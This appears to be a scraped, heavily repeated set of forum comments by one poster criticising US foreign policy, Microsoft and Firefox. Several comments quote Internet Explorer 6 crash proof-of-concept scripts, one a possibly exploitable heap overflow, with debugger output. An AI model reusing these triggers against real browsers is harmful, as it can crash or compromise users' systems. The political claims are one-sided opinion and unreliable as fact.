Unocal wants to put a pipeline through Afghanistan from the oil fields inland. That's why the U.S. military is in Afghanistan.
Unocal now has its contract. The idea is that the U.S. taxpayer pays for oil company security, thus raising the profits. The real cost of one gallon of gas is maybe $6.00. Three dollars directly paid, and three dollars indirectly paid through taxes.
You said, "From my outsiders' point of view, Brazil doesn't look like it's ahead of the rest of the world, socially; with a flourishing market in bullet-proof cars, it looks like a bigger mess than I'd ever care to live in."
We find it difficult to see our own messes, I think. If you are a taxpayer in the U.S., you pay to kill people in the Middle East and destroy their property. The U.S. has invaded, by my count, 24 countries since the 2nd world war. Part of the social cost of the constant violence is that people in the U.S. are the most obese in the world.
Certainly I agree that there are major messes in Brazil, also.
In fact, Osama bin Laden and others complain about events that have occurred in the last few decades. That's what made the U.S. a target. You can see officials from middle eastern countries mentioning this over and over again on Charlie Rose shows. Google video now carries Charlie Rose.
I'm NOT saying violence is justified. I'm against violence. But, the U.S. government did, in fact, interfere with the politics of Saudi Arabia, as Osama bin Laden claims. Remember 15 of the 18 attackers of the World Trade Center on 9/11/2001 were from Saudi Arabia.
Notice that, when Saudis attacked, the U.S. government invaded Iraq. Investigate why.
Before the U.S. government interfered with Arab and Muslim politics, Arabs and Muslims generally had a very positive view of the United States.
As usual, Brazil is ahead of the rest of the world in social things. Ricardo
Semler has been doing open source business for 20 years, as Chief Happiness
Officer. Here's a review of his book, The
Seven-Day Weekend: Changing the Way Work Works. Some people are
extremely enthusiastic about Semler's ideas: He's
my idol.
Normal CEO's are Chief
Unhappiness Officers. They steal everything they can, and act out their
anger toward everyone they can.
One of the most important examples of a business run in an adversarial
way is Microsoft, of course. After all this time, major media outlets are
starting to get it right. Here are quotes from the CNN article Microsoft security--no more second chances?:
"By now, Chertoff's
people must be thoroughly frustrated that Microsoft still turns out poorly
designed products."
"Here's something to consider: If bridge builders or airplane
designers applied the same standards to their labors, do you believe that the
public would so easily forgive the regularity with which bridges would
collapse and airliners fall out of the sky?"
If you like the CNN article, don't forget to D I G G it.
During the show Brian Ross of ABC said both governments break the laws of the other, and share the information.
They've been doing that for years, showing zero respect for the law and for the lawmakers. One of the things they have been doing is killing Arabs to increase oil profits.
On the Charlie Rose show last night, an ABC newscaster said that the U.S. and British governments spy on each other's citizens, doing things that would be illegal in their home countries, and share that information with each other.
It should be mentioned that the U.S. and British governments have been killing Arabs and interfering with Arab governments for more than 40 years, and that's what started the terrorism. See this very brief summary: History surrounding the U.S. wars with Iraq: Four short stories. They did this to increase oil and other profits, the same as now.
-- Will U.S. government violence end 3,000 years of violence in the
Middle East? Or, increase it?
The CPU hogging bug only occurs when Firefox windows and tabs are kept open over a period of hours or days. (See the link for a description.)
This causes lots of severe problems for heavy browser users, like equipment buyers, for example. Buyers often visit several pages, then have to wait for information, and while they are waiting, they work on buying other items.
The 1.5.0.4 version of Firefox was quite stable, if the Flashblock extension was installed. The 1.5.0.6 version is unstable again. The CPU-hogging bug is back!
This comment posted from a copy of Firefox that is constantly using 2.8% of the CPU, even when all pages have been loaded, and there is no active content. That's 2.8% on the way to 70% or more, making it necessary to close Firefox and reboot Windows XP.
There are some bugs found by Coverity left unfixed, but so far things have gotten worse since 1.5.0.4, not better.
"Is Microsoft purely incompetent and tone-deaf to customers - or simply
counting on IE's non-compliance remaining a de-facto standard?"
Microsoft's business model is heavily dependent, not on actually
giving customers what they want, but on tricks like "embrace, extend,
extinguish". Microsoft will make more money if everyone follows Microsoft's
non-standard way of doing things, because then everyone will need Microsoft
software to see web sites.
If it weren't for the fact that it is temporarily possible to trick
users who have little technical knowledge, Microsoft might be only barely profitable.
-- Will the violence of the U.S. government will end the 3,000
years of violence in the Middle East, or increase it?
Many Republicans are extremely corrupt, and are willing to do anything to get what they want. Read more about it: Armed Madhouse.
Do you think that the violence of the U.S. government will end the 3,000 years of violence in the Middle East?
Are you willing to pay to occupy Iraq so that supplies from the second biggest reserves of oil in the world can be restricted, thus driving up the price of oil?
Can people who gladly pay to kill other people be correctly called Christians?
"Can somebody please tell me, why are we still having this discussion?"
MOD PARENT UP!!!!
I've been hearing about buffer overflows almost all of my long life! Let's have the OpenBSD (secure by design) people write one routine for buffer handling for each language and make everyone use it. Save people from boredom and frustration.
"War is justified, sometimes, but not since World War 2."
The U.S. government has invaded 24 countries since the 2nd World War.
I agree. United States politics is dominated by those who believe they are Christian and George W. Bush is Christian, and who vote Republican. Actually, they often aren't Christian, they are often only angry. The other side is dominated by weak, disorganized Democrat politicians.
Most people don't understand the background. The U.S. government has been
helping oil companies in secret since before 1950, and that has led to an
expectation by rich oil investors that the U.S. government will lower the cost
of doing business by getting the U.S. taxpayer to pay for security
arrangements. The U.S. government secretly, or semi-secretly, breaks the law,
kills people, including Arabs and Muslims, and and destroys the property of
anyone who stands in the way of oil and other profits. Here is a short summary
of the kinds of actions that have caused the U.S. government to be corrupted:
History
surrounding the U.S. wars with Iraq: Four short stories.
The U.S. government is in dire circumstances. Money is being taken
from the people and given to the rich in enormous quantities. See the old
article, U.S. Federal Deficit
by Political Party. See how much things have gotten worse since then: National Debt. Oil and weapons
investors profit: Cost
of Iraq War.
It appears to me that Microsoft products are
deliberately not secure. Because Microsoft has a
temporary monopoly, Microsoft makes more money when its product is more
defective.
One of the main purposes of Vista is to get people
to buy new computers. Microsoft makes most of its money by selling to
computer manufacturers, and Microsoft is able to do what they want, not
what is good for the customers. That's the reason Microsoft doesn't fix
the bugs in Internet Explorer. When computers become slow because of
viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:
ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer
6 on a fully-patched Windows XP SP2 system. The interesting thing about
this bug is how the same property has to be set three different times
to trigger the exception.
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer
6 on a fully-patched Windows XPSP2 system. This bug is interesting
because a small heap overflow occurs eachtime this property is set. The
bug is difficult to detect unless heap verification has been enabled in
the global debug flags for iexplore.exe. The demonstration below
results in a possibly exploitable heap corruption after128 or more
iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
This bug was reported to Microsoft on March 6th, 2006.
StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer
6 on a fully-patched Windows XP SP2 system. This bug appears to be
triggered by a call to URLOpenBlockingStream() with a NULLpointer
referenced by the ppStream argument. The only way I found to trigger
this bug is by creating the object through the ActiveXObject interface
-- using the standard object/classid syntax (as described here)
does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
In my opinion, one of the main purposes of Vista is to get people to buy new computers.
Microsoft makes most of its money by selling to computer manufacturers, so
Microsoft does what they want, not what is good for the customers. That's the
reason Microsoft doesn't fix the bugs in Internet Explorer. When computers
become slow because of viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in
Internet Explorer, and many others:
ADODB.Recordset Filter
Property
The
following bug was tested on the latest version of Internet Explorer 6
on a fully-patched Windows XP SP2 system. The interesting thing about
this bug is how the same property has to be set three different times
to trigger the exception.
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested
on the latest version of Internet Explorer 6 on a fully-patched Windows XP
SP2 system. This bug is interesting because a small heap overflow occurs each
time this property is set. The bug is difficult to detect unless heap
verification has been enabled in the global debug flags for iexplore.exe. The
demonstration below results in a possibly exploitable heap corruption after
128 or more iterations of the property set.
var a = new
ActiveXObject("Internet.HHCtrl.1"); var b = unescape("XXXX"); while
(b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + ""; }
This bug was reported to Microsoft on March
6th, 2006.
StructuredGraphicsControl
SourceURL
The following bug was tested on the latest version of
Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug
appears to be triggered by a call to URLOpenBlockingStream() with a NULL
pointer referenced by the ppStream argument. The only way I found to trigger
this bug is by creating the object through the ActiveXObject interface --
using the standard object/classid syntax (as described here)
does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
This bug was reported to
Microsoft on March 6th, 2006.
Table.Frameset
The
following bug was tested on the latest version of Internet Explorer 6
on a fully-patched Windows XP SP2 system. This bug was found by Aviv
Raff using the DOM-Hanoi
fuzzer script. DOM-Hanoi works by building trees of every combination
of elements up to the specifed depth. An alternate PoC could use plain
HTML instead of javascript.
var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);
Because there have been many stories on Slashdot that seem like advertisements for Israeli companies: Northrop to Sell Laser Shield Bubble for Airports.
See also: The Car That Makes Its Own Fuel.
"Companies try to get the US government to make us taxpayers into suckers everyday."
And, it's another Slashvertisement for investment in an Israeli company.
Unocal wants to put a pipeline through Afghanistan from the oil fields inland. That's why the U.S. military is in Afghanistan.
Unocal now has its contract. The idea is that the U.S. taxpayer pays for oil company security, thus raising the profits. The real cost of one gallon of gas is maybe $6.00. Three dollars directly paid, and three dollars indirectly paid through taxes.
I'm an American who lives in the United States.
You said, "From my outsiders' point of view, Brazil doesn't look like it's ahead of the rest of the world, socially; with a flourishing market in bullet-proof cars, it looks like a bigger mess than I'd ever care to live in."
We find it difficult to see our own messes, I think. If you are a taxpayer in the U.S., you pay to kill people in the Middle East and destroy their property. The U.S. has invaded, by my count, 24 countries since the 2nd world war. Part of the social cost of the constant violence is that people in the U.S. are the most obese in the world.
Certainly I agree that there are major messes in Brazil, also.
In fact, Osama bin Laden and others complain about events that have occurred in the last few decades. That's what made the U.S. a target. You can see officials from middle eastern countries mentioning this over and over again on Charlie Rose shows. Google video now carries Charlie Rose.
I'm NOT saying violence is justified. I'm against violence. But, the U.S. government did, in fact, interfere with the politics of Saudi Arabia, as Osama bin Laden claims. Remember 15 of the 18 attackers of the World Trade Center on 9/11/2001 were from Saudi Arabia.
Notice that, when Saudis attacked, the U.S. government invaded Iraq. Investigate why.
Before the U.S. government interfered with Arab and Muslim politics, Arabs and Muslims generally had a very positive view of the United States.
As usual, Brazil is ahead of the rest of the world in social things. Ricardo Semler has been doing open source business for 20 years, as Chief Happiness Officer. Here's a review of his book, The Seven-Day Weekend: Changing the Way Work Works. Some people are extremely enthusiastic about Semler's ideas: He's my idol.
Normal CEO's are Chief Unhappiness Officers. They steal everything they can, and act out their anger toward everyone they can.
One of the most important examples of a business run in an adversarial way is Microsoft, of course. After all this time, major media outlets are starting to get it right. Here are quotes from the CNN article Microsoft security--no more second chances?:
"By now, Chertoff's people must be thoroughly frustrated that Microsoft still turns out poorly designed products."
"Here's something to consider: If bridge builders or airplane designers applied the same standards to their labors, do you believe that the public would so easily forgive the regularity with which bridges would collapse and airliners fall out of the sky?"
If you like the CNN article, don't forget to D I G G it.
I found a link to a video of the show: Charlie Rose - Brian Ross / Syria's role in the Mid-East / YouTube co-founders.
During the show Brian Ross of ABC said both governments break the laws of the other, and share the information.
They've been doing that for years, showing zero respect for the law and for the lawmakers. One of the things they have been doing is killing Arabs to increase oil profits.
On the Charlie Rose show last night, an ABC newscaster said that the U.S. and British governments spy on each other's citizens, doing things that would be illegal in their home countries, and share that information with each other.
It should be mentioned that the U.S. and British governments have been killing Arabs and interfering with Arab governments for more than 40 years, and that's what started the terrorism. See this very brief summary: History surrounding the U.S. wars with Iraq: Four short stories. They did this to increase oil and other profits, the same as now.
--
Will U.S. government violence end 3,000 years of violence in the Middle East? Or, increase it?
The CPU hogging bug only occurs when Firefox windows and tabs are kept open over a period of hours or days. (See the link for a description.)
This causes lots of severe problems for heavy browser users, like equipment buyers, for example. Buyers often visit several pages, then have to wait for information, and while they are waiting, they work on buying other items.
Firefox is, once again, the most unstable program in common use.
The 1.5.0.4 version of Firefox was quite stable, if the Flashblock extension was installed. The 1.5.0.6 version is unstable again. The CPU-hogging bug is back!
This comment posted from a copy of Firefox that is constantly using 2.8% of the CPU, even when all pages have been loaded, and there is no active content. That's 2.8% on the way to 70% or more, making it necessary to close Firefox and reboot Windows XP.
There are some bugs found by Coverity left unfixed, but so far things have gotten worse since 1.5.0.4, not better.
The article is of very poor quality. It doesn't even provide a link to the PC-BSD website.
MODERATORS: If you disagree with a comment, that does not mean it is a "troll".
"Is Microsoft purely incompetent and tone-deaf to customers - or simply counting on IE's non-compliance remaining a de-facto standard?"
Microsoft's business model is heavily dependent, not on actually giving customers what they want, but on tricks like "embrace, extend, extinguish". Microsoft will make more money if everyone follows Microsoft's non-standard way of doing things, because then everyone will need Microsoft software to see web sites.
If it weren't for the fact that it is temporarily possible to trick users who have little technical knowledge, Microsoft might be only barely profitable.
--
Will the violence of the U.S. government will end the 3,000 years of violence in the Middle East, or increase it?
Many Republicans are extremely corrupt, and are willing to do anything to get what they want. Read more about it: Armed Madhouse.
Do you think that the violence of the U.S. government will end the 3,000 years of violence in the Middle East?
Are you willing to pay to occupy Iraq so that supplies from the second biggest reserves of oil in the world can be restricted, thus driving up the price of oil?
Can people who gladly pay to kill other people be correctly called Christians?
"Anyone else seen this again over the last week?"
YES!!! See this comment: Firefox is the most unstable program in common use.
"Can somebody please tell me, why are we still having this discussion?"
MOD PARENT UP!!!!
I've been hearing about buffer overflows almost all of my long life! Let's have the OpenBSD (secure by design) people write one routine for buffer handling for each language and make everyone use it. Save people from boredom and frustration.
With the new version of Firefox, 1.5.0.5 and .6, Firefox is once again the most unstable program in common use.
Version 1.5.0.4 was quite stable. Now the CPU hogging bug is back!
... "judicial nominations" have consumed steadily more Congressional attention between 1997 and 2004.
In the U.S., there has recently been a strong focus on appointing judges who will help the rich get richer.
-
Operation Iraqi Liberation, OIL, has liberated Iraqi resources, not its people.
"War is justified, sometimes, but not since World War 2."
The U.S. government has invaded 24 countries since the 2nd World War.
I agree. United States politics is dominated by those who believe they are Christian and George W. Bush is Christian, and who vote Republican. Actually, they often aren't Christian, they are often only angry. The other side is dominated by weak, disorganized Democrat politicians.
Moderators: "I disagree" is not the same as "Flamebait".
Most people don't understand the background. The U.S. government has been helping oil companies in secret since before 1950, and that has led to an expectation by rich oil investors that the U.S. government will lower the cost of doing business by getting the U.S. taxpayer to pay for security arrangements. The U.S. government secretly, or semi-secretly, breaks the law, kills people, including Arabs and Muslims, and and destroys the property of anyone who stands in the way of oil and other profits. Here is a short summary of the kinds of actions that have caused the U.S. government to be corrupted: History surrounding the U.S. wars with Iraq: Four short stories.
The U.S. government is in dire circumstances. Money is being taken from the people and given to the rich in enormous quantities. See the old article, U.S. Federal Deficit by Political Party. See how much things have gotten worse since then: National Debt. Oil and weapons investors profit: Cost of Iraq War.
See a short review of books and movies about conflict of interest: Unprecedented Corruption: A guide to conflict of interest in the U.S. government.
It's far worse than these short references say.
Thanks for your excellent discussion of the issues
I don't know why he is leaving. Being a "Microsoft Security Guru" is apparently a job with no duties. See this movie: 144,000 known viruses for Microsoft operating systems.
It appears to me that Microsoft products are deliberately not secure. Because Microsoft has a temporary monopoly, Microsoft makes more money when its product is more defective.
One of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, and Microsoft is able to do what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:
ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XPSP2 system. This bug is interesting because a small heap overflow occurs eachtime this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
This bug was reported to Microsoft on March 6th, 2006.
StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULLpointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Table.Frameset
The follo
In my opinion, one of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, so Microsoft does what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:
ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
This bug was reported to Microsoft on March 6th, 2006.
StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Table.Frameset
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specifed depth. An alternate PoC could use plain HTML instead of javascript.
var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);
eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013a
The Bush Administration is the most corrupt federal government the U.S. has had: Unprecedented Corruption: A guide to conflict of interest in the U.S. government.
A more explicit link to the sig above: Retired CIA Official Says Bush Is A War Criminal.
--
Are you happy with the way your money is spent?